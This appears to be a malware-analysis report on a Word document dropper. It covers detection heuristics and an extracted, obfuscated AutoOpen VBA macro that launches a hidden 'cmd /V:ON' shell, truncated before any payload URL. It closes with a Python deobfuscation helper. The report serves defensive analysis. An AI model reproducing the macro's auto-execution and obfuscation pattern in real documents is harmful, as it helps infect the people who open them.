Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV identifies the sample with the signature Doc.Dropper.Emooodldr-6683740-0, a document-dropper detection. The VBA project recovered by olevba (macros.bas) contains a Sub AutoOpen, so the macro runs as soon as the document is opened with macros enabled; the On Error Resume Next at the top is itself split across line continuations to hinder string matching. The body is padded with arithmetic over undeclared variables that never affects control flow (On Error Resume Next swallows the resulting errors), and the only live statement is a Shell call whose command line is concatenated from three functions (rwahXZ, zjftYOWXDUjR, naczNushZ) with window style Format(0), i.e. 0 = vbHide, a hidden console. The visible start of rwahXZ builds Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/", which is "cmd /V:ON/" (cmd.exe with delayed variable expansion, commonly used to assemble a command from pieces at run time). The remainder of the command string is truncated in the preview, so the download-and-execute second stage is inferred from the dropper signature and this launch pattern rather than observed on this page. Note that OLE_LEGACY_WORDBASIC_AUTOEXEC fires on the AutoOpen marker even though a VBA project was in fact recovered; it adds no evidence beyond OLE_VBA_AUTOOPEN here.
Heuristics (5)

- ClamAV: Doc.Dropper.Emooodldr-6683740-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Emooodldr-6683740-0
- VBA macros detected [medium] OLE_VBA_MACROS: Document contains VBA macro code (1 related finding)
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML XML namespace identifier, present in any document with embedded drawing markup; it is not a download location and should not be treated as an indicator of compromise.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7908 bytes | 52c23b6ce14b9ae9c1abee11e57d6fae9bb1d19e38eff3fd2c76d83809240236 |
Preview script (first 1,000 lines of the extracted script; the page truncates the last line)

```vba
Attribute VB_Name = "wUfpDMVhqG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' "On Error Resume Next" split across line continuations to defeat naive string matching
On _
Error _
Resume _
Next
' Filler: arithmetic over undeclared names; the errors are swallowed and nothing reads the arrays
Dim wRumSE()
ReDim wRumSE(4)
wRumSE(0) = (16541 / zXhIk)
wRumSE(1) = 8417 * IQEJj / LIswc * YjfdA * (12560 / KzOJz * AqXCQX * 38615)
wRumSE(2) = XjQwm * 89192 * 43322 * 71309 * Bppnj / RujCTt
wRumSE(3) = 42747 / GGffXn * 11182 / ZIMAAP * (58885 / MuZpM / HqQDF * kVALB) * 73627 * rGOwz / ZQhbj / CPRpZU
Dim mzpPUh()
ReDim mzpPUh(3)
mzpPUh(0) = 95288 / EHAzNF / 75222 / zvbmm * (ZPhQD / SfarVE)
mzpPUh(1) = (44963 * RwiPGi / 23651 * 49543 * jYzcJs / suvjaZ / 66359 * iEZYh)
mzpPUh(2) = iJivr * RMjErz / zrGQIn / 92397 / (bJoRrQ * lBJns)
Dim PPhSt()
ReDim PPhSt(5)
PPhSt(0) = (25067 / Nqsall) / (YoQll * CAtdz * 66683 * aivDHV * 83966 * rjqtjS / 25467 * wrFfM)
PPhSt(1) = MsBGI * 5194 / 29647 / DSKVF / 67197 * oSPtlj / 10902 / rCqph
PPhSt(2) = 95707 * uDiNSC * 3385 / NoMWf * 46133 * NNiXHY / 80734 / bjGTJE * 33944 / 24911 / XRYHqs * tmRCE
PPhSt(3) = (KaBIo / LKqNER * jLjrw * ciwNzc / (UNdUH * hCVjRB / 29570 / BXhETp / LEKvVG * uMMCjR * zjVFQ / AKiRqh))
PPhSt(4) = (aGRJf / jJITZl / 63623 / 8774 * (16667 / TPVzi / 7375 / LwDEnA))
Dim uRwGOl()
ReDim uRwGOl(3)
uRwGOl(0) = (23255 / JAKcFD * (82663 * dbsBi))
uRwGOl(1) = (62728 / haTiV * khMjs * 7681 / (hjlQl / 47806))
uRwGOl(2) = (qzwmt / kFhwkO * (wPjuG * fZSzsM))
Dim cwqcQJ()
ReDim cwqcQJ(3)
cwqcQJ(0) = 52757 / iihkWj * zPzdpQ / ArJut * 61279 / BEZuW / IrUUE / 74230
cwqcQJ(1) = 42026 * CMVTwu / hsiJL / 20044 / zSVPvE * 63780 / HqAYW * vfZDu / wioavl * TLqlK / (95489 / rBwor * zcEfT / XKmNJ)
cwqcQJ(2) = (11360 * ZzViu * 38915 / ANNRF / 80885 / 52436 * QujkM * lVZIHW)
Dim dWmuJ()
ReDim dWmuJ(4)
dWmuJ(0) = (87139 / zHlqj)
dWmuJ(1) = LAITk / tNXzZX * RcmIro * SuZNU / 62292 / 81180 * WXmwMl / 98566 * jmBpcn * ZMWKb * 84642 * wuBXp
dWmuJ(2) = 32510 * uzEvKq / 99234 * bKNSr * 4356 / pwjin
dWmuJ(3) = 99469 / zVOrJ / (47702 * wpviJp)
Dim nwCnu()
ReDim nwCnu(2)
nwCnu(0) = (6634 * tiAoN)
nwCnu(1) = (TjjrBL * VjdWP / (KciwI * 66954 / (UwiCVO / sbOiO * 57174 / iTXvz / (28743 / 80740 * EVfXos * KmsGmb))))
' The only live statement: the command line is the concatenation of three functions; window style 0 = vbHide
Shell@ rwahXZ + zjftYOWXDUjR + naczNushZ, Format(0)
Dim AErbw()
ReDim AErbw(4)
AErbw(0) = (vPbduO * dfIpbk * 98047 * 38894 * (wIvJm / shXkZN * kinfaK / HXATz / (mrYflp * bGjjoC * 1226 / tGJob)))
AErbw(1) = 74593 / iBvKoQ * 32719 * HbJMHA / rzkRO / vHqXJj * 26482 * qiYnr / WkaAf / fcEfq / WkOKEK / RjuEm
AErbw(2) = (kDKQwl / PnnHY / 68348 / DwSCLh * 31393 * dCjaN / 29422 / ibfoVu)
AErbw(3) = VLItR / jzGmVY * 39195 * QstFP / (50891 * HkWYJ * ILckOq / dHuSPn * (51088 * vuFpuH))
Dim nbwWmz()
ReDim nbwWmz(5)
nbwWmz(0) = (FjPkaw / wtWcP / MzGlii * AzpQH)
nbwWmz(1) = 72408 * kmaBQ * (kLFzD / jvQAV / KOboV * nHYvG)
nbwWmz(2) = zdoqSJ * 37301 * 41950 / suBtH * (66341 / wdjzTM / XivRPN * wpENz)
nbwWmz(3) = (49193 * qcGhz * 84717 / TZvNc * (10642 * vLGXm * 62281 / LWsDI))
nbwWmz(4) = uFwfI / WIAcS * UfDEA * nHzCd / 96245 / MtuiGO * 56488 * oWOdPF / jBuio / SANGV
End Sub
' Second module (olevba concatenates the extracted modules into one file)
Attribute VB_Name = "liGUhNalVHna"
Function rwahXZ()
On _
Error _
Resume _
Next
Dim LmzQzi()
ReDim LmzQzi(5)
LmzQzi(0) = 64010 / NDdvQq * 67552 / jYBdNH
LmzQzi(1) = pEwla * iuilX / 18683 / lwbEcm / (ZCHXbX / 95921 / JoKXE * JLAsHO)
LmzQzi(2) = (JwJshn * 26837 / zwBbNk / zZKCOV) * (70246 / bzFTbk)
LmzQzi(3) = 50990 / VYLQE / fukjYM * IwrsWO * 52536 * EAMYIi / cTmAWl / DBTjAu / 31041 * izYzS / NaFWz / QXzrvO / (SRzXpG / 54603 / 86490 * ZnNhSn)
LmzQzi(4) = OAJPo / 27502 * 86367 / iXHQfB * 52996 * lHwAja * sqKXBR * SLcCl / mwzDYQ * RwMNoz
Dim zfziGq()
ReDim zfziGq(2)
zfziGq(0) = 8104 * tAVvI / (kGQYw * IdXMiY / 63366 * fZbMaZ / 40773 / hhOjh * zVZMRj * zjnbOn)
zfziGq(1) = 41896 / kDhJU / 54346 * ZJVik * 24314 / 47103 * (JNHdfC * SHzpip)
' Chr(6 + 4 + 13 + 15 + 61) = Chr(99) = "c", so this starts building "cmd /V:ON/"
dZnYZhq = Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/" + Fo ... (truncated)
```
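Most of the macro above is filler, and the command line only appears after Chr() arithmetic, Format() wrappers and string concatenation are folded. The following Python is an added example, not part of the analyzer or its output. It runs on a constructed excerpt modelled on the preview (the identifiers and arithmetic are copied from it; the rwahXZ body stops where the page truncates the real one) and shows the text-level simplification an analyst does before any dynamic analysis: drop the junk declarations and assignments, evaluate flat Chr() arithmetic without eval(), merge adjacent literals, and list which functions feed the Shell call. It is a simplifier for this one obfuscation style, not a VBA emulator; nested-parenthesis Chr() arguments and anything that depends on run-time state are left untouched.

```python
"""Text-level simplifier for the obfuscated AutoOpen macro shown above.

Added example (not analyzer output). It strips the junk arithmetic, folds
flat Chr(<integer arithmetic>) calls into string literals, unwraps
Format("...") around literals and merges adjacent literal concatenations,
so the pieces of the command line the macro hands to Shell become readable.
"""
import ast
import re

# Constructed excerpt modelled on the extracted macros.bas preview. The
# arithmetic lines are copied from the preview; the rwahXZ body stops where
# the page truncates it, so only the first fragment of the command survives.
SAMPLE_VBA = '''Attribute VB_Name = "wUfpDMVhqG"
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim wRumSE()
ReDim wRumSE(4)
wRumSE(0) = (16541 / zXhIk)
wRumSE(1) = 8417 * IQEJj / LIswc * YjfdA * (12560 / KzOJz * AqXCQX * 38615)
Shell@ rwahXZ + zjftYOWXDUjR + naczNushZ, Format(0)
End Sub
Attribute VB_Name = "liGUhNalVHna"
Function rwahXZ()
On Error Resume Next
Dim LmzQzi()
ReDim LmzQzi(5)
LmzQzi(0) = 64010 / NDdvQq * 67552 / jYBdNH
dZnYZhq = Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/"
End Function
'''

DECL = re.compile(r"^(Dim|ReDim)\s+\w+\(\d*\)$")
# name(index) = <numbers, identifiers, + - * / and parentheses only>
JUNK_ASSIGN = re.compile(r"^\w+\(\d+\)\s*=\s*[\w\s()+\-*/.]+$")
# Only flat arithmetic inside Chr(); nested parentheses are left untouched.
CHR_CALL = re.compile(r"Chr\(([\d\s+\-*/]+)\)")
FORMAT_LIT = re.compile(r'Format\(("[^"]*")\)')
CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')

_OPS = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
        ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}


def eval_int(expr):
    """Evaluate integer arithmetic (e.g. '6 + 4 + 13 + 15 + 61') by walking
    the AST, so eval() never sees attacker-controlled text."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError("unsupported construct in %r" % expr)
    value = walk(ast.parse(expr.strip(), mode="eval"))
    if value != int(value):
        raise ValueError("non-integer result for %r" % expr)
    return int(value)


def statements(src):
    """Join VBA ' _' line continuations (used here to hide On Error Resume
    Next) and return one stripped statement per line, skipping blanks."""
    joined = re.sub(r"[ \t]_\r?\n", " ", src)
    return [s.strip() for s in joined.splitlines() if s.strip()]


def is_junk(stmt):
    """Filler: array declarations and arithmetic over undeclared names whose
    errors On Error Resume Next swallows. Nothing downstream reads them."""
    return bool(DECL.match(stmt) or JUNK_ASSIGN.match(stmt))


def fold_strings(stmt):
    """Chr(arith) -> "x", Format("x") -> "x", "a" + "b" -> "ab" (repeatedly)."""
    stmt = CHR_CALL.sub(lambda m: '"%s"' % chr(eval_int(m.group(1))), stmt)
    stmt = FORMAT_LIT.sub(r"\1", stmt)
    while True:
        merged = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), stmt)
        if merged == stmt:
            return stmt
        stmt = merged


def simplify(src):
    """Return the macro with filler removed and string building folded."""
    return [fold_strings(s) for s in statements(src) if not is_junk(s)]


def shell_call_parts(src):
    """Names concatenated into the first Shell argument (the functions that
    build the command line) and the window-style argument, or ([], None)."""
    for stmt in statements(src):
        m = re.match(r"^Shell\W*\s*(.+?)\s*,\s*(.+)$", stmt)
        if m:
            return [p.strip() for p in m.group(1).split("+")], m.group(2)
    return [], None


if __name__ == "__main__":
    for line in simplify(SAMPLE_VBA):
        print(line)
    print("Shell argument built from:", shell_call_parts(SAMPLE_VBA))
```

On the excerpt this reduces rwahXZ to `dZnYZhq = "cmd /V:ON/"` and reports that the Shell command line is `rwahXZ + zjftYOWXDUjR + naczNushZ` with window style `Format(0)`; on the full macros.bas the same pass exposes the rest of the command only as far as it is built from literals and flat Chr() arithmetic, which is exactly the point at which to switch to a sandbox or a VBA emulator rather than keep guessing.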